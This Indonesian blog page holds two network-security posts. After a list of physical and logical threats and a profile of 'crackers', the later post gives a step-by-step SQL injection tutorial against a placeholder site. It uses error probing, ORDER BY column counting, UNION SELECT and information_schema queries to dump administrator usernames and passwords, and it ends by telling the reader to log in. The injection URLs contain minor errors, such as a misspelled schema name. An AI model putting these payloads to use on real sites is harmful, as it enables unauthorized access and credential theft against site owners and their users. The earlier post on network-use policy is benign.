Keamanan Jaringan

Widget Animasi

Jumat, 12 Agustus 2016

Keamanan Jaringan




Ancaman & Serangan dalam Jaringan Komputer
Kali ini kita akan membahas ancaman & serangan dalam jaringan komputer. Apasih ancaman dalam jaringan komputer itu?
Ancaman merupakan suatu usaha dan kegiatan baik dari luar ataupun dalam yang dapat membahayakan keselamatan.
Serangan dalam jaringan komputer itu dibagi menjadi 2, yaitu :
1.    Serangan fisik terhadap keamanan jaringan
·   Terjadi gangguan pada kabel
·   Kerusakan Harddisk
·   Konsleting
·   Data tak tersalur dengan baik
·   Koneksi tak terdeteksi
·   Akses bukan pengguna
·   Pencurian perangkat keras komputer
·   Kerusakan pada komputer dan perangkat komunikasi jaringan
·   Wiretapping
·   Bencana alam

      2. Serangan logik terhadap keamanan jaringan
·   SQL Injection adalah Hacking pada sistem komputer dengan mendapat akses
Basis Data pada Sistem
·  DoS (Denial of Service) adalah Serangan pada Sistem dengan mengabiskan Resource pada Sistem
·  Request Flooding adalah Serangan dengan membanjiri banyak Request pada Sistem yang dilayani Host sehingga Request banyak dari pengguna tak terdaftar dilayani oleh layanan tersebut.
·  Deface adalah adalah Serangan pada perubahan tampilan.
·  Social Engineering adalah Serangan pada sisi sosial dengan memanfaatkan kepercayaan pengguna. Hal ini seperti fake login hingga memanfaatkan kelemahan pengguna dalam social media.
·  Malicious Code adalah Serangan dengan menggunakan kode berbahaya dengan menyisipkan virus, worm atau Trojan Horse.
·  Packet Sniffer adalah Serangan menangkap paket yang lewat dalam sebuah Jaringan.

Beberapa Bentuk Ancaman Jaringan :
·         Sniffer : Peralatan yang dapat memonitor proses yang sedang berlangsung.
·         Spoofing : Penggunaan komputer untuk meniru (dengan cara menimpa identitas atau alamat IP.
·         Phreaking : Perilaku menjadikan sistem pengamanan telepon melemah
·         Remote Attack : Segala bentuk serangan terhadap suatu mesin dimana penyerangnya tidak memiliki kendali terhadap mesin tersebut karena dilakukan dari jarak jaruh di luar sistem jaringan atau media transmisi.
·         Hole : Kondisi dari software atau hardware yang bisa diakses oleh pemakai yang tidak memiliki otoritas atau meningkatnya tingkat pengaksesan tanpa melalui proses autorisasi.
·         Hacker : Orang yang secara diam-diam mempelajari sistem yang biasanya sukar dimengerti untuk kemudian mengelolanya dan men-share hasil ujicoba yang dilakukannya. Hacker tidak merusak system
·         Craker
-       Orang yang secara diam-diam mempelajari sistem dengan maksud jahat
-       Muncul karena sifat dasar manusia yang selalu ingin membangun (salah satunya merusak)

Ciri-ciri cracker :
·         Bisa membuat program C, C++ atau pearl
·         Memiliki pengetahuan TCP/IP
·         Menggunakan internet lebih dari 50 jam per-bulan
·         Menguasai sistem operasi UNIX atau VMS
·         Suka mengoleksi software atau hardware lama
·         Terhubung ke internet untuk menjalankan aksinya
·         Melakukan aksinya pada malam hari, dengan alasan waktu yang memungkinkan, jalur komunikasi tidak padat, tidak mudah diketahui orang lain

Penyebab cracker melakukan penyerangan :
·         spite, kecewa, balas dendam
·         sport, petualangan
·         profit, mencari keuntungan dari imbalan orang lain
·         stupidity, mencari perhatian
·         cruriosity, mencari perhatian
·         politics, alasan politis

Ciri-ciri target yang dibobol cracker :
·         Sulit ditentukan
·         Biasanya organisasi besar dan financial dengan system pengamanan yang canggih
·         Bila yang dibobol jaringan kecil biasanya sistem pengamanannya lemah, dan pemiliknya baru dalam bidang internet

Ciri-ciri target yang “berhasil” dibobol cracker :
·         Pengguna bisa mengakses, bisa masuk ke jaringan tanpa “nama” dan “password”
·         Pengganggu bisa mengakses, merusak, mengubah atau sejenisnya terhadap data
·         Pengganggu bisa mengambil alih kendali system
·         Sistem hang, gagal bekerja, reboot atau sistem berada dalam kondisi tidak dapat dioperasikan

    Selanjutnya kita masuk ke materi langkah-langkah SQL Injection. SQL Injection adalah Hacking pada sistem komputer dengan mendapat akses Basis Data pada Sistem.
    SQL Injection merupakan cara hack website yang paling banyak digunakan oleh para hacker. Kenapa? Karena dengan melakukan SQL injection, kita dapat langsung mengetahui username dan password dari website yang akan kita bajak. Dibawah ini merupakan kumpulan dork yang dapat kita gunakan untuk mencari error dalam suatu website yang nantinya akan kita gunakan sebagai target SQLi.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100' 
atau
http://www.target.com/berita.php?id=-100
3.  Maka akan muncul pesan error…
“    You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1″ Dan masih banyak lagi macamnya.
4. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya… Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
“/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”.  Kalo “+” sebagai penghubung perintah…
5. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/* 
6. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Lalu perhatikan angka berapa yang keluar.
7. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
8. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database..
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL.
Misalnya yang kamu liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda...
Terimakasih sudang berkunjung...


Sumber : 
http://setya21.blogspot.co.id/2010/03/macam-macam-virus-dan-dampaknya.html
https://infohackomputer.wordpress.com/2012/12/02/hack-website-dengan-teknik-sql-injection/



Jumat, 05 Agustus 2016

Keamanan Jaringan



Kebijakan Penggunaan Jaringan
Keamanan Jaringan



Keamanan jaringan adalah bentuk pencegahan atau deteksi pada hal yang bersifat gangguan dan akses tak seharusnya pada Sistem Jaringan Komputer.

Tujuan : Untuk mengantisipasi resiko jaringan komputer berupa bentuk ancaman fisik maupun logik baik langsung ataupun tidak langsung mengganggu aktivitas yang sedang berlangsung dalam jaringan komputer.

Kebijakan Penggunaan Jaringan adalah Rencana atau Acuan untuk mempengaruhi dan menentukan keputusan penggunaan Jaringan.

Kebijakan Organisasi adalah Suatu kebijakan instansi atau lembaga dalam ruang lingkup keamanan jaringan untuk akses pada sistem jaringan di tempat tersebut.
* Tata Kelola Sistem Komputer  
* Pengaturan Akses Jaringan  
* Manajemen Sumber Daya
* Pemeriksaan Sistem Secara Berkala  

Etika Menggunakan Jaringan adalah Suatu Penerapan Konsep benar / salah serta sikap tanggung jawab dalam menggunakan jaringan.
         * Memahami Akses Pengguna
         * Memahami kualitas Sumber Daya

Kebijakan mengakses Komputer adalah Kebijakan Pengguna Dalam Mengakses Komputer.
* Manajemen Pengguna
* Manajemen Sistem Komputer
* Manajemen Waktu Akses